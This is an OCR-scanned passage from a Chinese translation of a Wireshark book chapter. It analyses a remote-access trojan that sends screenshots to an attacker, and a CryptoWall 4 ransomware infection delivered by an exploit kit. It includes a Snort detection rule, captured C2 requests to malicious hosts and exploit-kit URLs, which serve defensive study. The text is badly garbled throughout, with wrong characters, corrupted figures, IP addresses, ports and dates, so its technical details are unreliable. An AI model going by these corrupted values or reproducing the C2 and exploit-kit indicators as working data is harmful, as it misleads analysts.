4433 问 口 和 6641 闪 口 通 信 ， 而 其 他 大 部 分 实例 出 现在 4433 疹 口 和 其 他 随 
机 选择 的 临时 端口 之 间 。 通 过 和 查看 Conversations 窗 口 的 TCP 标 签 ， 我 们 
可 以 确认 存在 多 个 会 话 ， 如 图 12-24 所 示 。 

















帮 Wireshark . Convarsations . ratinfected 一 口 xX 
Ethernet * 1 IPv4 ' 1 IPv6 TCP 8 UDP 
天 
Address A PortA AddressB PortB Packets Bytes PacketsA—B BytesA—B PacketsB—A BytesB—A RelStart Duration Bits/sA—B Bits/sB—A 
172.16.0.114 6641 172.16.0.111 4433 48 2989 24 1589 24 1400 0.000000000 132.129609 96 4 
172.16.0.114 6642 172.16.0.111 4433 10 585 6 343 4 242 0.012008000 132.117839 20 14 
172.16.0.114 “6643 172.16.0.111 4433 120 91k 87 89k 33 1807 74.205235000 0.066042 10M 218k 
172.16.0.114 6644 172.16.0.111 4433 120 91k 87 89k 33 1807 84.209773000 0.070058 10M 206k 
172.16.0.114 C6645 172.16.0.111 4433 121 94k 89 92k 32 1753 94.225097000 0.072995 10 M 192 k 
172.16.0.114 ”6646 172.16.0.111 4433 122 94k 91 93 k 31 1699 104.238408000 0.071781 10 M 189k 
172.16.0.114 ”6647 172.16.0.111 4433 119 91k 87 89k 32 1753 114.238812000 0.070326 10 M 199 k 
172.16.0.114 C6648 172.16.0.111 4433 119 91k 87 89k 32 1753 118.445540000 0.066413 10 M 211k 
六] Name resolution [DL Limit to display filter 
Copy 了 | Follow Stream... Graph... Close Help 








图 12-24 ”攻击 者 和 受害 者 之 间 存 在 3 个 独立 的 会 话 
我 们 可 以 给 捕获 文件 里 的 不 同 会 话 刷 上 不 同 颜 色 ， 将 他 们 从 视 党 上 


分 开 。 

(1) 在 Packet List 面 板 上 面 的 过 滤器 栏 里 ， 输 入 过 滤 
器 (tcp.flags.syn == 1) && (tcp.flags.ack == 6)。 然 后 单 击 
Apply。 这 将 氏 选 出 流量 中 每 一 个 会 话 的 初始 SYN 数 据 包 。 

(2) 右 击 第 一 个 数据 包 ， 选 择 Colorize Conversation 。 

(3) 选择 TCP， 然 后 选择 一 种 颜色 。 

(4) 为 剩 下 的 SYN 数 据 包 重复 这 个 过 程 ， 分 别 选 择 不 同 的 商 色 。 

(5) 完成 之 后 ， 选 择 Clear 移 除 过 滤器 

为 每 个 会 话 着 色 后 ， 我 们 可 以 看 一 看 他 们 之 间 有 什么 关隘， 这 将 帮 
助 我 们 更 好 地 跟踪 两 人 台 主 机 之 间 的 通信 过 程 。 第 一 个 会 话 (ports 


6641/4433) 是 两 端 通信 的 开 疹 ， 从 这 开始 不 会 错 了 。 碳 击 会 话 里 的 任 


选择 Follow TCP Stream 可 以 看 到 被 传输 的 数据 ， 如 图 12- 
25 上 所 示 。 





| Wireshark . Follow TCP Stream (tcp.stream eq 0) . ratinfected 


ANABILGI |556 @ 

ANABILGI |192.168.126.143|US |rat1|NO|Administrator / CSANDERS-6F7F77 |Windows XP Ser 
3|Intel(R) Core(TM)2 Duo CPU T9688 站 2. ee |511 MB|1.2|7/18/2818| @ 
BAGLIMI? 

BAGLIMI? 

BAGLIMI? 

BAGLIMI? © 

BAGLIMI? 

BAGLIMI? 

BAGLIMI? 

CAPSCREEN69 个 


CAPSCREENES 
BAGLIMI? 
CAPSCREEN6O 
BAGLIMI? 
CAPSCREENEO 
BAGLIMI? 
(LAPSLREEN6S 
LAPSCREEN6O 
BAGLIMI? 
BAGLIMI? 








14 chent pkitfsl 7 server phttsl 11 tnsl 
Entire conwersation (373 bytes) WA | show data as ASCII 
Find: 











Hide this stream | Print SaVE 358... Close 





图 12-25 ”第 一 个 会 话 产生 了 有 趣 的 结 


很 保 ， 我 们 看 到 攻击 者 给 受害 着 及 这 文本 字符 
串 “ANABILGII556”@O。 结 末 ， 受 害 阁 啊 应 了 一 些 基 本 系统 信息 ， 包 插 


计算 机 名 称 (CSANDERS-6F7F77) 和 使 用 的 操作 系统 (Windows XP 
Service Pack 3) 售 ， 并 开始 给 攻击 者 发 送 回 一 些 重复 的 字符 

串 “BAGLIMI?” 食 。 攻 击 者 返回 的 消 恩 只 有 字符 

上 串 “CAPSCREEN60”@， 出 现 了 6 次 。 


攻击 者 返回 的 字符 串 “CAPSCREEN60” 很 有 意思 ， 看 一 看 它 要 带 我 
们 去 哪里 。 我 们 再 次 使 用 search 对 话 框 在 数据 包 中 搜索 这 个 文本 字符 
串 ， 指 明 String 选 项 。 


我 们 搜索 到 数据 包 27 自 次 出 现 了 这 个 字符 串 。 这 个 信息 的 有 趣 之 处 
在 于 ， 各 户 站 一 收 到 攻击 者 肥大 的 这 个 字符 串 ， 就 确认 接收 这 个 数据 
包 ， 并 在 数据 包 29 发 起 了 一 个 新 会 话 。 


现在 ， 如 果 我 们 跟随 这 个 新 会 话 ( 见 图 12-26〉 的 TCP 流 输出 ， 就 能 
看 到 熟悉 的 字符 串 “ANABILGII12”， 跟 在 后 面 的 是 字符 串 “SH|556”， 最 
后 是 字符 串 “CAPSCREEN|IC:\WINDOWS\jpgevhook.dat|84972”@。 注意 
到 字符 串 “CAPSCREEN” 之 后 指明 的 文件 路 径 后 面 跟着 不 可 读 的 文本 。 

这 里 最 吸引 人 的 是 不 可 读 文本 有 一 人 前 导 字 竺 事 FIF 全 Google 搜 索 
一 下 知道 ，JPG 文 件 的 开头 部 分 通常 就 包含 它 


闫 Wireshark ,Follow TCP Stream (tcp.stream eq 2) ,ratinfected 和 口 ~ 








ANABILGI |12 A 
sH|556 
人 | vhook.dat|84572 @ 


8.)-,3:]>36F7, 
Bf >za 站 IORDS LE So .8..805-5 


&'()*56789:CDEFGHIJSTUVWXYZzcde efghi jst 
a a el eM a #p 


.*(..B.N. .tl. ATR Bt\- hj.I. 


se eg ee eh.. 





到 局 pkitsl 1 server pkitsl 1 turms) 


Entire conversation (85 kB) vw Show data as |ASCII 过 Stream 





Hide this stream Print Sav Close Help 





图 12-26 ”似乎 攻击 者 友 起 了 对 一 个 JPG 文 件 的 请 求 


到 这 里 ， 我 们 可 以 负责 任 地 说 ， 攻 击 者 发 起 新 会 话 是 为 了 传输 这 个 
JPG 图 像 。 但 更 重要 的 是 ， 我 们 开始 从 流量 中 推 新 出 一 个 命令 结构 。 看 
起 来 ， 攻 击 者 发 送 “CAPSCREEN”* 命 令 就 可 以 发 起 JPG 图 像 的 传输 。 实 
际 上 ， 不 管 什 么 时 候 发 送 *<CAPSCREEN” 命 令 ， 结 果 都 是 一 样 的 。 为 了 
验证 这 个 结论 ， 可 以 得 看 每 个 会 话 的 流 ， 或 使 用 下 面 介 绍 的 Wireshark 的 
IO 绘 图 功能 。 


(1) 选择 Statistics->IO Graphs。 


(2) 在 5 个 过 滤器 栏 中 分 别 插入 tcp.stream eq 2、tcp.stream 
eq 3、 tcp.stream eq 4、tcp.stream eq 5 和 tcp.stream eq 6。 


(3) 单 击 Graph 1、Graph 2、Graph 3、Graph 4 和 Graph 5 按钮 
分 别 局 用 各 个 过 滤 占 的 数据 点 。 


(4) 将 y 轴 的 单位 改 成 Bytes/Tick 。 
图 12-27 显 示 了 结果 图 像 。 









































帮 Wireshark .IO Graphs ,ratinfected 一 口 Xx 
Wireshark IO Graphs: ratinfected 
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45000 
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Stre 国 Line yt 

Stre 加 Line ytes/s 

+ 中 ouse (®) drags OO zooms 器] [|] Log scale 
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图 12-27 图 像 辟 示 同 样 的 活动 重复 了 多 次 


从 图 12-27 来 看 ， 似 乎 每 个 会 话 痢 包含 同样 大 小 的 数据 ， 并 出 现 了 
同样 多 的 时 间 。 现 在 我 们 可 以 总 结 ， 这 个 活动 重复 了 好 几 次 。 


对 于 传输 的 JPG 图 片 内 容 ， 你 可 能 已经 有 了 些 想 法 ， 所 以 让 我 们 看 
ee 能 查看 这 些 JPG 文 件 。 执行 以 下 步 台 可 以 从 Wireshark 中 提取 
JPG 数 据 。 


(1) 首先 ， 对 特定 数据 包 的 TCP 流 进行 重组 ， 如 之 前 网 12-22 所 示 
的 文本 。 


(2) 然后 通信 被 分 离 出 来 ， 我 们 只 能 看 到 受害 者 发 送 给 攻击 者 的 
流 数 据 。 选 择 下 拉 玉 单 劳 边 的 箭头 ， 那 里 写 着 Entire Conversation 
(85633 bytes)。 确 你 选择 合适 有 的 流量 方 同 ， 束 
是 172.16.6.114:6643 --> 172.16.9.111:4433 (85626 bytes)。 


(3) 选择 Save As 按钮 保存 数据 ， 确 保 扩 展 名 是 .jpg。 


你 现在 试 一 下 ， 一 定 会 发 现 它 无 法 打开 。 因 为 我 们 还 需要 再 做 一 
步 。 不 像 在 第 8 半 从 FTP 流 量 中 提取 完整 文件 那样 ， 这 里 的 流量 在 真实 
数据 之 外 还 增加 了 一 些 额 外 内 容 。 在 这 个 例子 中 ，TCP 流 的 前 两 行 实际 
上 是 木马 命令 序列 的 一 部 分 ， 而 不 属于 JPG 数 据 〈( 见 图 12-28〉 。 当 我 们 
保存 数据 流 时 ， 这 些 籁 外 的 数据 也 被 保存 了 了 下来。 结果， 文件 浏览 器 查 
找 JPG 文 件 头 时 遇 到 了 预料 之 外 的 信息 ， 导 致 它 不 能 打开 图 请 。 


闫 Wireshark , Follow TCP Stream (tcp.stream eq 2) , ratinfected 





SH|556 
ni es vhook.dat |84972 Exiraneous Data 


)16.)-,3:]>36F7， 
BWAFLNRSR2>Z3 pd tt i &. .805-5 
k 


#3R. .br 


B'()*56789:CDEFGHIISTUNDY Zedefehijs ti 
a a 和 
Nr a i BRA 
Tr ee 8 < Nt og A 

: 和 9 SR 本 


.Cnm5 
2 了 9 ARGf wh. .2 Jt. .^(..B. 0 -| +N ch. 
fF .MOR, ji. 
ge 1 1 De a 人 


EL 二 汪 和 二 短 玫 坟 汉 





84 clenrtrpktSsl Dsaryerpltsl O tuys) 
172, 16.0, 114:6643.— 172, 16,0, 111:4433 (85 kB) Show data as |ASCII be Stream 


pt 


Hide this stream in ave as... Close Help 





图 12-28 特洛伊 木马 增加 的 额外 数据 导致 文件 无 法 正确 打开 


用 十 六 进 制 编辑 项 修复 这 个 问题 很 简单 。 这 个 过 程 叫 “文件 修 
复 ”(File carving〉。 在 图 12-29 中 ， 我 已 经 用 WinHex 选 定 JPG 文 件 前 面 
的 一 些 字 节 。 你 可 以 使 用 任何 十 六 进 制 编辑 右 删 除 这 些 字 市 并 你 存 图 三 


文件 。 


瘟 WinHex - [image2jpg] 

区 File 
i Ee dE 
image2,pg 


区 著 蛆 品 | 


Edit Search Navigation View Tools Specialist Options Window Help 
| 丘 A O07 
pwrr SB San 


一 和 


| 己 守 如 国 忆 


19.1 SR-1 - 日 x 


入 8 





Offsct 
00000000 
00000012 
00000024 
00000036 
00000048 
0000005N\ 
0000006C 
CO00007E 
00000090 
000000RA> 
000000B4 


0 1 2 3 4 5 6 7 
53 48 7C 35 35 36 OA 43 
3A 5C 57 49 4E 44 4F 57 
6B 2E 64 61 74 7c 38 34 
4A 46 49 46 00 01 01 00 
DO ON 09 0A OB NA 08 0DND 
13 M2 DD 43 D7 CTRST7 
3A 4A 3E 33 36 46 37 2C 
32 3E 5A 61 5A 50 60 4A 
om 13 11 13 26 15 15 26 
A4F 4F 4F 4F 4F AF 4F 4F 
AF 4F 4F 4F 4F 4F 4F 4F 


dg 引 沪 沪 沁 而 宙 油 
41 50 53 43 52 45 45 4E 
53 5C 6A 70 67 65 76 68 
39 37 32 OA FF D8 FF EO 
00 01 00 01 00 00 FF DB 
OP OA OB OF OF ON OF 13 
20 2E 29 31 30 2E 29 2D 
2D 40 57 41 46 4C 4E 52 
51 52 4F FF DB 00 43 01 
4F 35 2D 35 4F 4F 4F 4F 
4F AF 4F 4F 4F 4F AF 4F 
4F 4F 4F 4F 4F 4F 4F 4F 


L011 
1C°43 
6F 6F 
00 10 
00 43 
2 Ts 
2C 33 
下 号 二 人 
OE OE 
4F 4P 


AN ASCII ~ 
SHI1556 CAPSCREENI|C 
: \WINDOWS\JjEgevhoo 
k.dat|84972 vOya 
JFIF yO C 


a La) 3 
:J>36EF7,—@WAFLNRSR 
2>ZaZP* JQOROYU C 

& &05-5000000 


4F 4F 00000000000000000O0 
4F 4F OQOOOOOOOOOOOOONVOOOO 





图 12-29” 移 除 JPG 文 件 中 的 附加 字 节 


移 除 不 需要 的 数据 后 ， 文 件 应 议 能 够 打开 了 。 人 很 显然 ， 木 与 将 受害 
者 的 果 男 进行 截屏 ， 并 发 送 回 给 攻击 者 〈( 见 图 12-30) 。 





图 12-30 


这 些 退 信和 序列 完成 之 后 ， 退 信和 束 随 看 TCP 拆 


这 个 场景 展示 的 四 
时 ， 应 如 循 的 典型 步 桑 。 


发 送 的 JPG 文 件 是 受害 者 计算 机 的 屏幕 截图 
除 包 而 结束 了 。 


过 程 ， 束 是 一 位 入 侵 分析 师 分 析 IDS 管 报 流量 


D4 


得 看 羡 报 及 触及 它 的 特征 。 

在 恰当 的 上 下 文 确定 特征 确实 在 流量 中 。 

查看 流量 ， 找 出 攻击 者 对 “肉鸡 ” 动 了 什么 手脚 。 
(4) 在 “肉鸡 ?刘露 更 多 敏感 信息 之 前 ， 控 制 局 面 。 


12.4 漏洞 利用 工具 包 和 勒索 软件 


在 最 后 一 个 场景 中 ， 我 们 将 研究 IDS 的 一 次 告警 。 我 们 将 查看 从 被 
感染 的 系统 中 采集 到 的 实时 数据 包 ， 并 答 试 对 攻击 行为 进行 渊源 。 我 们 
将 在 本 例 中 使 用 可 能 会 从 身边 设备 中 发 现 的 真实 恶意 软件 。 

Snort 的 Sguil 控 制 台 进行 了 一 次 IDS 告 警 ， 如 图 12-31 所 示 。Sguil 是 
用 于 对 一 个 或 多 个 感应 天 发 出 的 告 葡 进行 管理 、 玛 看 和 研究 的 工具 。 生 
人 界面 ， 是 在 安全 研究 人 员 中 很 流行 的 工 


也 


(1 


D4 


(2 


Se 


(3 


在 Sguil 中 有 很 多 关于 这 次 告警 的 信息 。 顶 部 的 窗口 @ 显 示 了 告警 的 
概要 信息 。 包 括 在 告警 发 生 时 的 源 和 目的 IP 地 址 、 端 口 ， 协 议 ， 根 据 匹 
配 的 IDS 标 识 产 生 的 事件 消息 。 在 本 例 中 ， 本 地 系统 192.168.122.145 正 
在 与 位 于 184.170.149.44 的 未 知 外 部 系统 进行 通信 ， 外 部 系统 使 用 的 问 
口 为 80， 此 问 口 通 和 与 HITP 通 信 联 系 起 来 。 这 个 外 部 系统 被 认为 是 恶 
意 主 机 ， 告 警 旺 示 ， 该 系统 与 一 个 识别 恶意 通信 的 标识 有 关 ， 并 且 关 于 
此 系统 ， 我 们 了 解 的 信息 很 少 。 这 次 通信 匹配 到 的 标识 代表 了 由 
CyptoWall 扯 意 软件 族 发 起 的 签到 流量 ， 这 意味 着 一 个 该 扯 意 软件 的 变 
体 被 安装 在 内 部 系统 中 。 


Sguil 控 制 台 提供 了 [匹配 规则 的 语法 信和 单个 数据 包 中 与 规则 相 [ 匹 配 
的 数据 食 。 我 们 注意 到 ， 数 据 信息 被 拆 分 为 协议 涉 和 数据 部 分 ， 与 
Wireshark 中 的 数据 包 信 息 展 现形 式 类 似 。 不 竺 的 是 ，Sguil 仅 提供 单个 
被 匹配 的 数据 包 的 信息 ， 但 是 我 们 需要 更 深入 的 研究 。 下 一 步 ， 在 
Wireshark 中 检查 与 这 次 告 风 相关 的 通信 ， 演 试 定 位 告警 流量 ， 并 查看 出 
现 的 问题 。 这 些 流量 在 cryptowall4_ c2.pcapng 中 。 


mm SGUIL-0.9.0 - Connected To localhost ms [ey 
File Query Reports Sound: Off ae es Se a UserID: 2 Se 


Date/TImMe 


2016-07-1518:59:54 192.168.122.145 49357 184.170.149.44 ET TROJAN Cryptowall Check-in OO 


lv Show Packet Data Iv Show Rule 


alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN CryptoWall Check-in"; flow:established,to_server; urilen:<134; content:"="; offset:1; depth:1; 
http_client_body; content:" MSIE fast_pattern; http_user agent; content:"Acceapt|3a 20|*/*|0d 0a|Content-Type|3a 20|application/X-wWww- -form- urlencoded |0d 
0al" depth:62; http_header; content:!"|0d 0a|Accept-"; nocase; http_header; content:!"Referer| 3a|"; http_header; pcre:"/[V=][a-z0-9]{8,}$/U"; 
pere:"/M[a-z]=[a-f0-9]{80,}$/P"; reference:md5,3c53c9f7ab32a09de89bb44e5f31f9af; classtype:trojan-activity; sid:2018452; rev:15;) 

soreplay-atho insm/server_data/securityonion/rules/soreplay-ethO/downloaded.rules: Line 13680 





soreplay-os... 


soreplay-athO 
soreplay-ath0 








soreplay-athO SourceIP Dest IP Flags Offset 
|192.168.122.145 |184.170.149.44 | 


Window Urp 





/*,.Content-Typ 
e: application/x 
-www-form-urlenc 
odad-. .Connection 
: Close..Content 
-Length; 131..Us 
er-Agent: Mozill 
a/4.0 (compatibl 
e; MSIE 7.0; Win 
dows NT 6.1; WOW 
64; Trident/7.,0; 

SLCC2; ,NET CLR 

2.0.50727; .NET 

CLR 3.5.30729: 
.NET CLR 3.0.307 
29; Media Center 

PC 0.0])7sHost: 
homealldaylong.c 
om. .Cache-Contro 
[IE 了 让 











Update Interval (secs): vv | Search Packet Payload | mT Hex 全 Text [ NoCase 











图 12-31 IDS 告 警 表明 一 次 CryptoWall 4 感染 


这 个 抓 包 文件 包含 了 告警 时 间 前 后 的 通信 过 程 ， 数 据 并 不 是 太 复 
A 第 一 次 会 话 出 现在 数据 包 1 一 16 中 ， 我 们 可 以 跟踪 会 话 的 TCP 汶 
( 见 图 12-32) 以 便于 碍 看 。 在 抓 包 文件 的 开头 ， 本 地 系统 建立 了 到 恶 
意 主机 80 端 口 的 TCP 连 接 ， 之 后 向 一 个 URL 人 @ 凡 起 了 一 次 POSTIi 衣 求 ， 
请 求 包含 少量 市 有 文字 与 数字 的 数据 从 。 在 连接 正 芝 新 开 末 ， 恶 意 主 机 
回复 了 一 个 由 文字 和 数字 组 成 的 字符 串 人 外 和 HTTP 200 OK 啊 应 人 码 。 


如 有 末 浏 览 抓 包 文 件 的 剩余 部 分 ， 你 会 肥 现 以 上 的 序列 在 这 些 服务 
之 加 重复 出 现 ， 每 次 传输 的 数据 量 有 差异 。 议 置 饶 选 条 件 
为 http .request .method == "POST"， 看 到 出 现 了 3 次 类 似 URL 结 构 
的 连接 〈 见 图 12-33) 


请 求 页 面部 分 (76N1Lm.php) 保持 一 致 ， 但 是 余下 的 内 容 〈 补 发 
至 该 页 面 的 参数 和 数据 ) 有 变动 。 这 个 重复 的 通信 序列 和 请 求 结构 ， 与 
恶意 软件 的 命令 和 控制 (C2) 行为 一 致 ， 并 符合 此 IDS 和 告警 标 识 的 匹配 
规则 。 你 可 以 在 流行 的 Cyrpto 研 究 网 站 Crypto Tracker 上 看 到 = 有 
例子 ， 从 而 进一步 核实 。 


而 Wireshark .Follow TCP Stream (tcp.stream eq 0) . cryptowall4_c2 


POST /76NILm.php3jn=x4tkzt4jo6 HTTP/1.1 ©O@ 
Accept: */* 

Content-Type: application/x-www-form-urlencoded 
Connection: Close 

Content-Length: 131 


User-Agent: Mozilla/4#.8 (compatible; MSIE 7.8; Windows NT 6.1; WOW64; Trident/7.8; SLCC2; .NET CLR 


5 
2.0.50727; .NET CLR 3.5.39729j .NET CLR 3.8.386729; Media Kenter PC 6.8) 


Host: homealldaylong.com 
Cache-Control: no-cache 


o0=6b787638683333616b6431668f85f2393c1a354ad6e57d984568837ecebfe368e790ca9e211cdc8f5cf1b865484cf67e685 
4938778@69bbcc6b7eae8681985814e8HTTP/1.1 288 OK 

Date: Mon, 84 Jan 2816 16:26:38 GMT 

Server: Apache/2.2.31 (Unix) mod ssl/2.2.31 OQpenSsSsL/1.8.1e-fips mod bwlimited/1.4 mod qos/11.5 
X-Powered-By: PHP/5.4.45 

C tion: close 

Transfer-Encoding: chunked 

Content-Type: text/html 


已 
1663bdec2ddbcc @ 
0 








3 cen pitts 2 server PtS 1 turnys) 
Entire conversation (772 bytes) 于 Show data as |ASCII bg stream 0 六 


Find: Find Next 


Hide this stream | Print Save as... Close 





图 12-32 ”少量 信息 通过 HTTP 在 服务 器 之 间 传 输 


No. Tim Source Destination Protocol Info 
1 6 8.491136 192.168.122.145 184.1798.149 .44 HTTP POST /76N1lLm.php?n=x4tk7t4jo6 HTTP/1.1 (application/x-www-form-urlencoded) 
2 15.54556 192.168.122.145 184 44 HTTP POST /76NILm.php>g=9m822y31]xud7aj HTTP/1.1 (application/x-www-form-urlencoded) 


22 15- 2 -168 122 . g 
152 41.886948 192.168.122.145 184.179-149 .44 HTTP POST /76N1Lm.php2i=ttfkjb668o38k1z HTTP/1.1 (application/x-www-form-urlencoded) 





图 12-33” URL 结构 显示 ,不同 的 数据 被 发 送 至 同一 个 页 面 


既然 已 经 确定 及 生 了 基于 恶意 软件 的 C2 通 信 ， 我 们 束 应 访 采 取 补 救 
措施 ， 并 定位 被 感染 的 机 右 。 当 问题 涉及 例如 CryptoLocker 的 恶意 软件 
时 ， 这 样 的 措施 尤为 重要 ， 因 为 这 类 恶意 软件 会 试图 加 密 用 户 数据 ， 除 
非 用 户 文 付 高 额 赎金 ， 人 否则 攻击 者 不 会 捉 供 解密 密 钥 一 一 这 关 恶 意 软 件 
航 称 为 勒 守 软 件 。 被 勒 款 软 件 感 染 的 补救 措施 不 在 本 书 的 讨论 范围 内 ; 
在 现实 场景 中 ， 这 是 安全 分 析 人 员 的 后 续 研 究 内 容 。 


通 利 ， 下 一 个 需要 考 碟 的 问题 是 ， 内 部 系统 最 初 是 如 何 极 恶意 软件 
感染 的 。 如 果 管 案 能 够 说 确定 ， 那 么 你 可 能 会 友 现 其 他 设备 因为 类 似 的 
原因 被 万 外 的 恶意 软件 感染 ;或 者 能 够 开 肥 防护 工具 、 制 定 检 测 机 制 ， 
避免 可 能 友 生 的 感染 。 


告警 数据 包 仅 显示 了 被 感染 后 的 C2 序 列 。 在 采用 了 安全 监控 和 持续 
抓 包 的 网 络 中 ， 很 多 感应 帮 饿 设置 为 存储 几 小 时 或 几 天 内 的 流量 数据 ， 
用 于 取证 分 析 。 毕 葛 ， 不 是 每 一 个 机 构 都 使 用 了 能 够 实时 告警 鸭 设备 。 
数据 包 的 临时 存储 让 我 们 能 够 便 看 ， 在 前 面 看 到 的 C2 序列 开始 之 前 ， 被 
感染 主机 发 出 的 数据 。 这 些 流量 数据 在 ek_to_cryptowall4.pcapng 中 。 





在 这 个 抓 包 文件 中 有 更 多 的 数据 包 ， 新 增 数据 包 都 是 HITP 通 信 数 
据 。 我 们 已 经 了 解 了 HTTP 是 如 何 工 作 的 ， 现 在 让 我 们 切入 正题 ， 设 置 
过 滤 条 件 为 http.request， 仪 查看 HTTP 请 求 。 沛 选 结果 显示 了 了 11 次 由 内 部 
主机 发 起 的 HTTP 请 求 〈《 见 图 12-34) 。 








No， Tme SoUrce Destination Protocol Inio 
446.534405 192.168.122.145 113.28.11.49 HTTP GET findex.php/servicas HTTP/1.1 
35 5-265859 192.168.122.145 45.32.238.282 HTTP GET /contrary/1653873/quite-someone-visitor-nonsense-tonight-sweet-await-gigantic-dance-third HTT?/1.1 
39 6-1995698 192.168.122.145 45.32.238.282 HTTP GET /occasional/bXJkeHF1YXhmaA HTTP/1.1 
123 9.126714 192.168.122.145 45.32.238.282 HTTP GET fgoodness/1854996/earnest-fantastic-thorough-weave-grot=sque-forth-awaken-fountain HTTP/1.1 
139 14.,028289 192,168,122.145 45,.32,236.202 HTTP GET /observation/enVjz2dtcnpz HTTP/1,1 
441 36,245463 192,168,122.145 213,.186.33,18 HTTP PO5T /VOEHSQ,php?v=x4tk7t4jo06 HTTP/1,I (application/x-www-form-urlencoded) 
456 41.772768 192.168.122.145 184.179.149 .44 HTTP POST /776N1Lm.php?n-x4ttk7zt4jo6 HTTP/1.1 《application/X-www-form-urlencoded) 
472 45.628284 192.16g5.I22.145 213.186.33.18 HTTP POST AVOEHSQ-php?w=gms22y311xud7aj HIIP/1.1 (application/x-www-form-urlencoded) 
467 56.827194 192.168.122.145 184.170.149 .44 HTTP POST 776N1Ln.phpyg=9m522y311xud7aj HTTP/1.1 (application/x-www-form-urlencoded) 
619 73.971402 192.168.122.145 213.186.33.18 HTTP POS™T /VOEHSQ.php}h=ttfkjb668038kiz HTTP/1.1 (application/x-mww-form-urlencoded) 
634 83.168589 192.168,122.145 184.179.149 .44 HTTP POST /76NlLm,php?i=ttfkjb668038klz HTTP/1.1 (application/x-www-form-urlencoded) 








图 12-34 ”11 个 由 内 部 主机 发 起 的 HTTP 请 求 


第 一 个 请 求 由 内 部 主机 192.168.122.145 发 往 未知 外 部 主机 
113.20.11.49。 碍 看 数据 包 的 HITP 部 分 〈 见 图 12-35) ， 我 们 发 现 用 户 请 
求 了 一 个 页 面 @， 页 面 入 口 为 Bing 搜 索 这 个 网 址 的 结果 人 @。 到 目前 为 
止 ， 看 起 来 一 切 正 第 。 


友 Wireshark . Packet 4. ek to_cryptowall4 





Frame 4: 488 bytes on wire (3904 bits), 488 bytes captured (3964 bits) on interface 0 
Ethernet II, Src: Del] e2:4b:86 (88:22:19:e2:4b:86), Dst: CiscoInc_cb:83:4a (88:86:c1:cb:83:4a) 
Internet Protocol Version 4, Src;: 192,168.,122,.145, Dst; 113.29,.11.49 
Transmission Control Protocol, Src Port: 49314 (49314), Dst Port: 88 (88), Seq: 4283943695, Ack: 3947361356, Len: 434 
~ lypertext Transfer Protocol 
GET /index.php/services HTTP/1.1\r\n 和 
Accept: text/html, application/xhtml+xml, */*\r\n | 
@ Referer: http://www.bing.com/search?q=sydneygroup.com.au&qs=n&form=QBRE&pq=sydneygroup. com.au&sc=1-20&sp=-1&sk=&cvid=B8C@A2B7AC354F9437A526D981E8274C\r\n | 
Accept-Language: en-US\r\n | 
Agent: Mozilla/5.9 (Windows NT 6.1; WOW64; Trident/7.8; rv:11.0) like Gecko\r\n 
Accept-Encoding: gzip, deflate\r\n 
Host; www.sydneygroup,.com.au\r\n 











No 4 * Time; 0.534405 * Sourre; 192,168, 122,145 * Destination: 113,20,11,49 * Prorwocol: HTTP Jp GET /nder.phnservices HTTP/1,1 





图 12-35 一 次 发 往 未 知 外 部 主机 的 HTTP 请 求 


接 下 来 ， 内 部 主机 在 数据 包 35、39、123 和 130 中 发 送 了 4 个 向 另 一 
个 未 知 外 部 主机 45.32.238.202 的 请 求 。 在 之 前 章 市 的 例子 中 我 们 了 解 
到 ， 当 浏 贤 器 访问 的 页 面包 含 外 部 内 容 引 用 或 第 三 方 服务 右上 的 广告 
时 ， 从 网 站 服务 如 以 外 的 主机 获取 内 容 是 很 常见 的 。 昌 然 请 求 的 URL 看 
起 来 有 些 林 乱 ， 但 是 这 个 请 求 本 身 并 不 令 人 担忧 。 


从 数据 包 39 中 的 GET 请 求 开始 ， 数 据 开 始 值 得 注意 。 跟 踪 这 次 交互 
的 TCP 流 《〈 见 图 12-36) ， 你 会 发 现 内 部 主机 请 求 了 名 为 
bXJkeHFIYXhmaA 的 文件 @。 这 个 文件 名 比较 奇怪 ， 并 且 没 有 文件 扩展 
C2 


| Wireshark :Follow TCP Stream (tcp.stream eq 1) . ek to_cryptowall4 





ional/bxJkeHF1IYXhmaA HTTP/1.1 种 


cept-Language: en-Us 
erer: http://xktzjm.topcentc.top/contrary/1653873/quite-someone-visitor-nonsense-tonight-sweet-await-gigantic- 
ir 


i 
X S ersion: 19,8,8,245 
Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/5.8 (Windows NT 6.1; WOW64; Trident/7.9j rv:11.8) like Gecko 
Host: xktzjm.topcentc.top 

DNT: 1 

Connection: Keep-Alive 


HTTP/1.1 288 OK 
Server: nginx/1.4.6 (Ubuntu) 


Content-Type: application/x-shockwave-flas 
Transfer-Encoding: chunked 
Connection: keep-alive 


1f6a 
1 ”eo te a 9 or A 
9 oA i ps /3 U F @ A a eh SY 
二 下 
lt O00 dL be Ela q 

sme 

Nl 

ee 

.<z。。.&.VR] ..[XP*+-[.U-o.]PQZz. v 











3 chient pktlsl E67 server pktls} 5 turnls) 
Entire conversation (88 kB) show data as |ASCII 下 Stream |1 睛 


Find: Find Next 


Hide this stream Print Save as... Close Help 








图 12-36 ”一 个 名 称奇 怪 的 Flash 文 件 被 下 载 


在 更 细致 的 检查 中 ， 我 们 看 到 Web 服 务 器 将 文件 内 容 识 别 为 X- 
shockwave- flash 人 @ 类 型 。Flash 是 浏览 如 上 流行 的 流 媒 体 插 件 。 设 备 下 载 
Flash 内 容 很 下 第， 但 是 值得 注意 的 是 ，Flash 由 于 有 很 多 软件 漏洞 而 员 
名 上 昭著， 并 且 ，Flash 经 常 不 修补 漏洞 。 随 后 ，Flash 文 件 被 成 功 下 载 。 


Flash 文 件 被 下 载 后 ， 在 数据 包 130 中 有 一 个 类 似 的 请 求 请 求 一 
个 名 称奇 怪 的 文件 。 跟 踪 这 个 TCP 流 〈( 见 图 12-37) ， 你 会 看 到 请 求 的 文 
件 名 为 enVjZ2dtcnpz@。 这 个 文件 的 类 型 没有 被 扩展 名 标明 或 补 服 务 器 
识别 。 这 个 请 求 完 成 后 ， 客 户 关 下载 了 一 个 大 小 为 358400 字 市 的 无 法 疯 
读 的 数据 文件 人 @。 


该 文件 下 载 完 毕 后 不 到 20s， 你 会 看 到 在 图 12-34 中 出 现 过 的 一 系列 
HTTP 请 求 。 从 数据 包 441 开 始 ， 内 部 服务 器 同 两 个 不 同 的 服务 器 发 送 相 
同 的 C2 格式 HTTP POST 请 求 。 我 们 可 能 发 现 了 感染 的 源头 。 下 载 的 两 
个 文件 是 问题 的 原因 。 数 据 包 39 中 请 求 的 第 一 个 文件 是 一 个 Flash 漏 调 利 
用 程序 ， 在 数据 包 130 中 请 求 的 第 二 个 文件 是 恶意 软件 。 








